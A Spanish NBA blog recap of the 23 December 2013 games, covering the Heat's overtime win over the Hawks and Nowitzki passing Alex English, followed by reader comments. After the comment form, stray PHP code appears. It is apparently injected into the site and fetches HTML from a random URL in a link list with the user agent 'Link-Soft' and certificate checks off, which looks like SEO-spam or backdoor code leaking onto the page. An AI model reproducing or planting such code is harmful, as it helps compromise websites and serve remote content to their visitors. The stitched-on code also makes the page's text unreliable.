La Crónica: Sufrida victoria de Miami

24 de December de 2013 por Simon

Jornada con muchos partidos pero pocos realmente importantes para el devenir de la liga. En una jornada corta de atractivo deportivo lo más interesante a priori era ver a Tyreke Evans y Andre Iguodala jugar ante sus antiguas aficiones pero como esto es la NBA, aquí siempre pasan cosas. Los Heat tuvieron que sufrir de lo lindo para doblegar a los Hawks, Bobcats y Bucks disputaron una emocionante prórroga y Dirk Nowitzki dio un paso más en su inevitable camino hacia la leyenda.

Empezaremos con los dos cabecillas del Este que no fallaron ayer y se llevaron sendas victorias aunque de manera muy diferente. Indiana no pasó ningún apuro para derrotar con comodidad a Brooklyn Nets (103-86). Un espectacular Lance Stephenson, el mejor del partido, continúa maravillando a todo el mundo con enormes actuaciones que hacen que su caché para este verano continúe creciendo.  Los que sí tuvieron que sudar mucho más a pesar de jugar en casa fueron los Miami Heat, que necesitaron de un nuevo milagro de Ray Allen para forzar la prórroga y llevarse el partido en la misma. Y es que los Heat sufrieron de verdad. A la baja de Wade se unió un golpe en la cara que hizo retirarse a Chris Bosh a dos minutos del final. Miami perdía de 7 a falta de minuto y medio para el final pero justo en ese momento apareció “King” James para anotar dos triples y un mate brutal de forma consecutiva y acercar a su equipo. Aún 3 abajo y con sólo 8 segundos para el final Ray Allen lanzó un triple que no entró pero en el que los árbitros consideraron que había habido falta de Carroll lo que permitió al escolta de los Heat mandar el partido a la prórroga desde la línea de tiros libres. En el tiempo extra fueron los tiros libres los que volvieron a decidir. Esta vez le tocó a Michael Beasley anotar sus tiros para poner por delante a Miami. Korver falló en la última jugada y los Heat por fin pudieron festejar la victoria (119-121). 

Tampoco pasaron apuros los San Antonio Spurs que vencieron a unos sorprendentes Toronto Raptors que venían de vencer consecutivamente en las canchas de Dallas y Oklahoma. Duncan y compañía no les dieron ninguna oportunidad y mantuvieron siempre el partido bajo control (99-112). Otro duelo interesante de la jornada era la visita de Dallas Mavericks a Houston pero el partido quedó algo descafeinado por la ya conocida baja de James Harden. A pesar de otro enorme partido de Howard, los Mavs tomaron el mando en el tercer cuarto y pudieron llevarse una victoria cómoda de una cancha difícil como es el Toyota Center (111-104). Además, Dirk Nowitzki se convirtió en el décimotercer máximo anotador de la historia de la liga tras superar a Alex English. Si mantiene este ritmo, al final de temporada estará en el top 10. Una leyenda viva el alemán. La derrota de Houston fue aprovechada por unos Phoenix Suns que todo el mundo sigue esperando que caigan pero que siguen dispuestos a pelear y ya están quintos en la conferencia. Ayer dieron una buena tunda a los Lakers de la mano de un colosal Miles Plumlee (90-117).

El morbo de la jornada lo ponían los reencuentros triunfales de Tyreke Evans y André Iguodala con sus anteriores aficiones. Tyreke Evans aprovechó su visita a Sacramento para cuajar su mejor partido con los Pelicans y ayudar a su equipo a llevarse la victoria gracias a un gran último cuarto (113-100). Este triunfo les permite seguir en el grupo de equipos que luchan por mantener sus opciones de playoffs, grupo que actualmente lidera Denver Nuggets a pesar de la derrota ante los Golden State. Con esta victoria los Warriors consiguen un colchón de dos victorias sobre el noveno clasificado de la conferencia, precisamente los Nuggets (89-81).

En el resto de la jornada, los Bucks perdieron su tercer partido en la prórroga de los últimos 5 días, esta vez ante los Bobcats (110-111). Sin duda, deben de estar frustrados de rozar siempre las victorias. Detroit tuvo un partido muy cómodo en Cleveland (115-92); los Knicks ganaron sufriendo ante los Magic un partido que iban ganando de 20 puntos cuando se produjo la lesión de Carmelo Anthony mediado el tercer cuarto (103-98), y los Grizzlies no tuvieron excesivos problemas para deshacerse de Utah Jazz (94-104).

PREMIOS

MVP: Lebron James tuvo que exprimirse al máximo para imponerse en casa a los Hawks. Sus 38 puntos, 8 rebotes, 6 asistencias y 2 robos casi se llevan el premio del “Esfuerzo en vano”. Kemba Walker se quedó a un rebote del triple doble (25-9-10) pero lo más destacable fueron los siete puntos que anotó en la prórroga.

Rookie: Giannis Antetokounmpo se ha hecho con un puesto de titular en lo Bucks y no tiene pinta de querer soltarlo. Acabó con 12 puntos y 6 rebotes. El italiano Luigi Datome anotó 13 puntos, cogió 4 rebotes y robó 2 balones en 17 minutos. Matthew Dellavedova consiguió 10 puntos y 6 asistencias en los 27 minutos que jugó. Trey Burke anotó 18 puntos.

Sorpresa: Miles Plumlee se dio un festín con el juego interior de los Lakers. Anotó 17 puntos y cogió 20 rebotes. Andre Miller sigue demostrando que la veteranía es un grado. Salió desde el banquillo para dirigir a los Nuggets y acabó con 14 puntos y 8 asistencias. Otro veterano, Jameer Nelson, se quedó a nada de conseguir un triple doble. Se fue a los 17 puntos, 8 rebotes y 12 asistencias.

Decepción: Harrison Barnes se quedó en 2 puntos con un 1 de  en TC. Lo más extraño es que apenas aportó en otras facetas estadísticas. Peor le fueron las cosas a Paul Pierce que falló los 7 tiros que intentó y se quedó sin anotar.

Esfuerzo en vano: Perdieron los Bucks en Charlotte pero no porque Brandon Knight no lo diera todo. Se fue a 26 puntos, 14 asistencias y 8 rebotes.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

18 comentarios a esta entrada

  1. franitis dice:
    #1

    Felices Fiestas Señores. Que lo paséis bien en compañía de vuestras familias y amigos. Cuidado con la carretera y consumid con mesura, que después nos lamentamos…

      Citar

  2. Mamba_Blanca dice:
    #2

    Impresionante los clinic de baloncesto que sigue dando Andre “juego andando” Miller. Sin hacer ruido esta entre los 10 máximos asistentes en la historia de la NBA.

    Feliz Navidad a todos y gracias por seguir aqui un año más!

      Citar

  3. Ruxixón dice:
    #3

    Ray Allen,como un reloj,cuando hace falta siempre está.Vaya fichajazo.El partido contra Lakers el día de Navidad promete ser épico,en el lado negativo para Los Angeles,a ver si sabiendo que ese día hay muchísima audiencia dan la mejor versión y se lo ponen difícil a ls Heat,algo que todos agradeceríamos.Algo similar pasará en el Oklahoma – New York,los Thunder que vienen de perder,los Knicks estando como están…da miedo pensar en el resultado.

    Felices fiestas igualmente,una lástima que hoy no haya NBA,malditos gandules xD

    PD.Fenómeno Paul Pierce en rollo Papa Noel repartiendo regalos.

      Citar

  4. txusma dice:
    #4

    ¿Que diría mi madre si a eso de la 1h00 le dijera que me tenía que ir a ver NBA? 😀

    Feliza Navidad a todos!

      Citar

  5. Vader dice:
    #5

    Que decepción Harrison Barnes… yo pensaba que este año se saldria.

      Citar

  6. Vader dice:
    #6

    Feliz Navidad a todos!!!!

      Citar

  7. Denise dice:
    #7

    txusma:
    ¿Que diría mi madre si a eso de la 1h00 le dijera que me tenía que ir a ver NBA?

    Feliza Navidad a todos!

    Mejor ver la NBA que tragarse el especial de Raphael….

    Que mala y decepcionante temporada de los Magic y Oladipo muy mal ultimamente. El año pasado me gustaba el trabajo de Vaughn,. este año quiero que lo larguen ya y no se coma el turrón. Bring back McMillan!!

      Citar

  8. txusma dice:
    #8

    Oladipo ha pasado a ser suplente y a no disputar muchos minutos. Habrá q ver que planes tienen los Magic para el trade deadline. Supongo que Glen Davis y Arron Afflalo se irán cosa que permitirá a Oladipo y Nicholson volver a disfrutar de tiempo de juego. Mo Harkless es otro que ha desaparecido…

      Citar

  9. Denise dice:
    #9

    txusma:
    Oladipo ha pasado a ser suplente y a no disputar muchos minutos. Habrá q ver que planes tienen los Magic para el trade deadline. Supongo que Glen Davis y Arron Afflalo se irán cosa que permitirá a Oladipo y Nicholson volver a disfrutar de tiempo de juego. Mo Harkless es otro que ha desaparecido…

    Nelson tambien es probable que salga en el Deadline, practicamente es expiring porque el año que viene tiene un Team Option de 8 kilos que Orlando no va a ejecutar, por lo que sería bueno sacar algo por él y de paso darle la oportunidad de irse a un contender a ganar un anillo.
    La rotación de los Magic es dificil de encajar. hay equipos malos pero cortos, sin profundidad de banquillo, pero en el caso de Orlando es raro porque es un mal equipo como así lo demuestra la tabla, pero tiene 11-12 jugadores utiles y optimos de entrar en cualquier rotación.

      Citar

  10. Esteban dice:
    #10

    txusma: pasó ningún apuro para derrotar con comodidad a Brooklyn Nets (103-86). Un espectacular Lance Stephenson, el mejor del partido, continúa maravillando a todo el mundo con enormes actuaciones que hacen que su caché para este verano continúe creciendo.  Los que sí tuvieron que sudar mucho más a pesar de jugar en casa fueron los Miami Heat, que necesitaron de un nuevo milagro de Ray Allen para forzar la prórroga y llevarse el partido en la misma. Y es que los Heat sufrieron de verdad. A la baja de Wade se unió un golpe en la cara que hizo retirarse a Chris Bosh a dos minutos del final. Miami perdía de 7 a falta de minuto y medio para el final pero justo en ese momento apareció “King” James para anotar dos triples y un mate brutal de forma consecutiva y acercar a su equipo. Aún 3 abajo y con sólo 8 segundos para el final Ray Allen lanzó un triple que no entró pero en el que los árbitros consideraron que había habido falta de Carroll lo que permitió al escolta de los Heat mandar el partido a la prórroga desde la línea de tiros libres. En el tiempo extra fueron los tiros libres los que volvieron a decidir. Esta vez le tocó a Michael Beasley anotar sus tiros para poner por delante a Miami. Korver falló en la última jugada y los Heat por fin pudieron festejar la victoria (119-121). 

    bendecidos quien puedan hacerse con davis y afflalo, dos jugadores con contratos buenos y cortos ademas de ser sumamente utiles

      Citar

  11. Esteban dice:
    #11

    me confundi, quise citar otro comentario en el anterior

    vieron el final del juego de los Bobcats? cuanta gente en ese estadio, se olfatean PO en carolina del norte y se esta jugando como tal

    a ver si la gerencia usa a Gordon para mejorar el equipo, justamente un Afflalo y Davis por Gordon y el pick de primera ronda de los bobcats, seria mucho desear, pero que bien les vendrian ambos

      Citar

  12. Luis H. dice:
    #12

    Denise, no creo que sea un acierto deshacerse de Afflalo y tengo dudas sobre Glen Davis. Este equipo tiene base en Vucevic y el bueno del draft que venga el año que viene. A Harris, Nicholson y Harkless hay que pedirles más regularidad. Un base joven y barato por Nelson -Etwaun Moore es escolta- si Oladipo no empieza a desarrollar. De lo malo, podría quedar como suplente de Afflalo

      Citar

  13. TheDeerHunter dice:
    #13

    Feliz navidad, señores.

      Citar

  14. Denise dice:
    #14

    Luis H.:
    Denise, no creo que sea un acierto deshacerse de Afflalo y tengo dudas sobre Glen Davis. Este equipo tiene base en Vucevic y el bueno del draft que venga el año que viene. A Harris, Nicholson y Harkless hay que pedirles más regularidad. Un base joven y barato por Nelson -Etwaun Moore es escolta- si Oladipo no empieza a desarrollar. De lo malo, podría quedar como suplente de Afflalo

    Depende de lo que recibas a cambio, pero tampoco yo traspasaría a Affalo en estos momentos. A Glen Davis si, los F/C siempre son necesarios en cualquier equipo y podrías recibir buenas cosas por él. Ademas con Harris, Maxiell y Nicholson el PF estaría mas que cubierto. A Nelson tambien para pillar algo a cambio ya que es expiring.

    Malas noticias para Knicks, a Felton le dan un mes de baja, y Melo quiere jugar contra Oklahoma mañana pero lo veo demasiado precipitado. El choque probablemente lo van a perder con ó sin Melo y ponerlo en pista puede pasarle factura y podría recaer en algo mas grave. Sería mejor dejarle descansar 4-5 dias.

      Citar

  15. nba dice:
    #15

    TheDeerHunter:
    Feliz navidad, señores.

    Igualmente Deer, feliz navidad a todos los que haceis posible este blog, y a los que lo enriquecen con sus comentarios

      Citar

  16. Tobal dice:
    #16

    Yo quiero destacar lo de Nowitzki,que va agrandando su leyenda,ya es el décimotercer anotador en la historia de la NBA,dentro de muy poco,estará entre los diez primeros,este hombre es muy bueno,ya no quedan adjetivos para definirle.

      Citar

  17. Ruxixón dice:
    #17

    Los Knicks acaban de cosechar su peor derrota como local en un partido en el día de Navidad.Los Knicks siguen batiendo récords y no hay ningún movimiento desde la gerencia.

      Citar

  18. oli dice:
    #18

    Brutal el mate de Lebron, mira que me cae mal pero hay que reconocer lo inevitable y es que es el mejor, de momento los lakers aguantan

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>